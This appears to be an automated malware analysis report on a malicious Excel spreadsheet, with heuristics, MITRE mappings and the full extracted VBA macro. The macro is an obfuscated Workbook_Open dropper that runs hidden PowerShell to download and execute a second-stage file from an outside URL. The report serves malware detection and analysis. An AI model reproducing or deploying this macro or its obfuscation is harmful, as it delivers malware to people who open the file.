MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The sample contains a Workbook_Open macro that uses the Shell() function to execute a PowerShell command. This command is constructed by concatenating several strings to form a URL and a filename for a second-stage executable. The macro attempts to download and execute this payload from 'http://monde.at/realst'. The Japanese text in the document body serves as a lure to encourage macro execution.
Heuristics 4
-
ClamAV: Xls.Dropper.Generic-6595971-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Dropper.Generic-6595971-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2508 bytes |
SHA-256: b6b00bc53f056c7c4fbfbb432485b95c951d9fe0465641003eb92799fcbb858b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function sheetunderground()
sheetunderground = "sY`STe" + "m.Ne" + "t.`w`E" + "Bc" + "l`IE"
End Function
Function starsunfire()
Dim gardengrass As String
Randomize
gardengrass = Int(Rnd * 9437006#)
starsunfire = gardengrass
End Function
Function fabinachii()
fabinachii = "cm" + ffmulti + "c "" PO" + "weRsH" + dellpacket & ostinmuffa + staloneumo + libocountries & picassoweb
End Function
Function ffmulti()
ffmulti = "d.e" + "Xe /"
End Function
Function picassoweb()
inextimer = starsunfire
holeblackdeep = "'tp:'+'//'+'mo'+'nde.at/r'+'eal'+'st'),\""$lenovo\" + "\" + inextimer + ".e" + "xe\"")}wh"
fantaandcola = "ile(!$?);" + "&(\""{1}{0}{2}\""-f'ro','S" + "tart-P','cess') $LEnOvo\" + inextimer + ".e" + "XE"""""
picassoweb = holeblackdeep + fantaandcola
End Function
Function ostinmuffa()
ostinmuffa = "Fil ""Sv bXzO9" + "1 ([tYPe](\""{2}" + "{1}{0}\""-F 'Me" + "nT','IroN','ENv')); d" + "o{.(\""{1}{0}\"" -f'p','s" + "lee') 41;$lenovo = (ge"
End Function
Function dellpacket()
dellpacket = "ElL -noLOGO -NOeXIt -noNI" + "NTERAcTIV -WInDO hiDd" + "en -EXecUt" + "ionP bYpAss -nOpRO"
End Function
Sub Workbook_Open()
Shell fabinachii, fmTabOrientationTop
End Sub
Function libocountries()
hawaiiposition = "nT" + ").\""d" + "o`" + "Wn"
libocountries = "3}{0" + "}{2}\"" -f'c" + "','Ne" + "w-O" + "bj" + "','t','e') " + sheetunderground + hawaiiposition + "LO" + "aDF`I`lE\"".\""iN`Vo" + "Ke\""(('ht'+"
End Function
Function staloneumo()
depodeposit = "e(('M" + "y'+'D"
staloneumo = "T-c" + "hil" + "D" + "IT" + "Em Va" + "R" + "iAB" + "le:bx" + "zo91 ).v" + "aL" + "Ue:" + ":(\""{2}{0" + "}{3}{1}\""-f 't" + "F','rP" + "ath','G" + "e','ol" + "de').Invok" + depodeposit + "o'+'cu'+'me'+'nts'));(.(\""{1}{"
End Function
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.